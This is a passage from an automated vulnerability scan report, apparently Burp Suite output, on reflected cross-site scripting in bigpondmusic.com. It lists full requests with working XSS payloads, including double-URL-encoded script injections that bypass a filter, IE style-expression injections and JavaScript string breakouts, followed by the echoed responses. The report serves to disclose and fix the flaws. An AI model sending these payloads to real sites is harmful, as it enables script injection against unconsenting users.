Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88461


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album965ed"><script>alert(1)</script>d0c19fa9bd1/various-artists/weekend-songs" />
...[SNIP]...

2.160. http://bigpondmusic.com/album/various-artists/weekend-songs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/various-artists/weekend-songs

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a148'%3b45d6ab478f5 was submitted in the REST URL parameter 1. This input was echoed as 3a148';45d6ab478f5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album3a148'%3b45d6ab478f5/various-artists/weekend-songs HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88238


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album3a148';45d6ab478f5';
   s.prop4 = 'various-artists';
   s.prop5 = 'weekend-songs';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.p
...[SNIP]...

2.161. http://bigpondmusic.com/album/various-artists/weekend-songs [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/various-artists/weekend-songs

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3767"style%3d"x%3aexpression(alert(1))"e545b48a308 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c3767"style="x:expression(alert(1))"e545b48a308 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/various-artists/weekend-songs?c3767"style%3d"x%3aexpression(alert(1))"e545b48a308=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 169650


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Various Artists - Weekend So
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/various-artists/weekend-songs?c3767"style="x:expression(alert(1))"e545b48a308=1" />
...[SNIP]...

2.162. http://bigpondmusic.com/bargains/dalbums [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/dalbums

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1081'%3b46a0f08e718 was submitted in the REST URL parameter 1. This input was echoed as e1081';46a0f08e718 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargainse1081'%3b46a0f08e718/dalbums HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:17:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87802


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
bpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargainse1081';46a0f08e718';
   s.prop4 = 'dalbums';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11
...[SNIP]...

2.163. http://bigpondmusic.com/bargains/dalbums [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/dalbums

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e05b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a53617805a was submitted in the REST URL parameter 1. This input was echoed as 1e05b"><script>alert(1)</script>6a53617805a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains1e05b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a53617805a/dalbums HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:17:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87866


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains1e05b"><script>alert(1)</script>6a53617805a/dalbums" />
...[SNIP]...

2.164. http://bigpondmusic.com/bargains/dalbums [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/dalbums

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eadd3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f418beffdc was submitted in the REST URL parameter 2. This input was echoed as eadd3"><script>alert(1)</script>9f418beffdc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains/dalbumseadd3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f418beffdc HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:17:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88231


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/dalbumseadd3"><script>alert(1)</script>9f418beffdc" />
...[SNIP]...

2.165. http://bigpondmusic.com/bargains/dalbums [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/dalbums

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 907ce'%3beb1515a2326 was submitted in the REST URL parameter 2. This input was echoed as 907ce';eb1515a2326 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargains/dalbums907ce'%3beb1515a2326 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:17:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87793


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
sting.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargains';
   s.prop4 = 'dalbums907ce';eb1515a2326';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.166. http://bigpondmusic.com/bargains/dalbums [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/dalbums

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 643e0"style%3d"x%3aexpression(alert(1))"352441b3890 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 643e0"style="x:expression(alert(1))"352441b3890 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bargains/dalbums?643e0"style%3d"x%3aexpression(alert(1))"352441b3890=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:16:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 349065


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Double Albums - BigPond Musi
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/dalbums?643e0"style="x:expression(alert(1))"352441b3890=1" />
...[SNIP]...

2.167. http://bigpondmusic.com/bargains/under11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/under11

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 553f9'%3b12846113a16 was submitted in the REST URL parameter 1. This input was echoed as 553f9';12846113a16 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargains553f9'%3b12846113a16/under11 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:16:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87871


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
bpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargains553f9';12846113a16';
   s.prop4 = 'under11';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11
...[SNIP]...

2.168. http://bigpondmusic.com/bargains/under11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under11

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be40b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea55f571f2e8 was submitted in the REST URL parameter 1. This input was echoed as be40b"><script>alert(1)</script>a55f571f2e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargainsbe40b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea55f571f2e8/under11 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:16:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87904


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargainsbe40b"><script>alert(1)</script>a55f571f2e8/under11" />
...[SNIP]...

2.169. http://bigpondmusic.com/bargains/under11 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under11

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a0f0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6d2018e8d34 was submitted in the REST URL parameter 2. This input was echoed as 2a0f0"><script>alert(1)</script>6d2018e8d34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains/under112a0f0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6d2018e8d34 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:16:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87866


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under112a0f0"><script>alert(1)</script>6d2018e8d34" />
...[SNIP]...

2.170. http://bigpondmusic.com/bargains/under11 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/under11

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4a97'%3b192cd7debc4 was submitted in the REST URL parameter 2. This input was echoed as f4a97';192cd7debc4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargains/under11f4a97'%3b192cd7debc4 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:16:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87733


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
sting.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargains';
   s.prop4 = 'under11f4a97';192cd7debc4';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
